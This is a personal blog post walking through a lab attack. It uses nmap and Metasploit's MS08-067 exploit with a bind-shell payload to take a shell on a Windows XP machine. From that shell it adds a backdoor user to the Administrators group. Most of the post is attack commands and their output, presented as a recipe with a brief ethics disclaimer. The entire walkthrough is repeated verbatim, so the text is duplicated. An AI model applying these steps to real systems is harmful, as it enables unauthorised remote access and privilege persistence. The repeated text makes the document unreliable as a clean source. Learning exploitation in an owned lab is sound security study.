After a long time I am writing this post. I was trying some hands on with metasploit framework. For exercise i choosed fedora9 as my attacker machine(bz i liked fedora) and installed framework with postgresql DB support. For attacking machine i choosed machine with windows XP with service pack 2. From this excercise i got very interesting result and even that result surprised me. The result was I got , xp command promt and from that promt first of all I created two user( one is administrator and other normal). For starting i think this is ok. The procedure i follows is as: I started from nmap port scanning.
% nmap -A -T4
This scan gave me all open port on xp. After getting open port i use framework to perform actual attack. Open msfconsole on terminal.
%msfconsole
Now run following command
%msf->use exploit/windows/smb/ms08_067_netapi
%msf->set RHOST 192.168.xxx.xxx
%msf->set RPORT 445
%msf->set PAYLOAD generic/shell_bind_tcp
now run final command to attack
%msf->exploit
now if lucky, you will get following command prompt. Now you can do whatever you want to do.
For adding user from command prompt use following command
%C:\WINDOWS\system32>net user testuser test123 /add
the message from terminal
"net user testuser test123 /add
The command completed successfully."
For adding administrator use following command
%C:\WINDOWS\system32>net localgroup Administrators /add testuser
or C:\WINDOWS\system32>net localgroup “Power Users” /add testuser(quotes required here)
the message
"net localgroup Administrators /add testuser
The command completed successfully."
Now type exit on command prompt to exit
#C:\Documents and Settings\Administrator\Desktop>exit
exit
This is very starting. Still choosing module and attacking with different payload, etc. there are lots of thing to learn. I posted here just because i thought it will help you to learn security.
ps: This post is just for learning perpous. Please do not use in unethical manner. Respect others privacy.
% nmap -A -T4
This scan gave me all open port on xp. After getting open port i use framework to perform actual attack. Open msfconsole on terminal.
%msfconsole
Now run following command
%msf->use exploit/windows/smb/ms08_067_netapi
%msf->set RHOST 192.168.xxx.xxx
%msf->set RPORT 445
%msf->set PAYLOAD generic/shell_bind_tcp
now run final command to attack
%msf->exploit
now if lucky, you will get following command prompt. Now you can do whatever you want to do.
For adding user from command prompt use following command
%C:\WINDOWS\system32>net user testuser test123 /add
the message from terminal
"net user testuser test123 /add
The command completed successfully."
For adding administrator use following command
%C:\WINDOWS\system32>net localgroup Administrators /add testuser
or C:\WINDOWS\system32>net localgroup “Power Users” /add testuser(quotes required here)
the message
"net localgroup Administrators /add testuser
The command completed successfully."
Now type exit on command prompt to exit
#C:\Documents and Settings\Administrator\Desktop>exit
exit
This is very starting. Still choosing module and attacking with different payload, etc. there are lots of thing to learn. I posted here just because i thought it will help you to learn security.
ps: This post is just for learning perpous. Please do not use in unethical manner. Respect others privacy.
